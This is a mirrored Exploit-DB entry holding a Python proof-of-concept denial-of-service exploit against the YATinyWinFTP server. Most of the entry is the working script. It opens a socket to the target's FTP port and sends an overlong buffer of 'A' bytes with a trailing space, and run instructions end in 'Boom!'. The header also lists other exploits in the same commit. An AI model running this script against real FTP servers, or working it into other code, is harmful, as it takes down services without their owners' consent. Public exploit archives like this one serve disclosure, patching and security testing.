exploit-db-mirror/exploits/windows/remote/49127.py
Offensive Security 216721f32c DB: 2020-12-01
4 changes to exploits/shellcodes

YATinyWinFTP - Denial of Service (PoC)
ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Intelbras Router RF 301K 1.1.2 - Authentication Bypass
2020-12-01 05:01:56 +00:00

35 lines
No EOL
1,010 B
Python
Executable file

# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10
------------------------------[Description]---------------------------------
This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
The result it crashes
-----------------------------[Exploit]---------------------------------------------
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import socket, sys
target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()
-----------------------------[how to run]-----------------------------
C:\> TinyWinFTP.exe servepath port
~$ python3 exploit.py targetip port
Boom!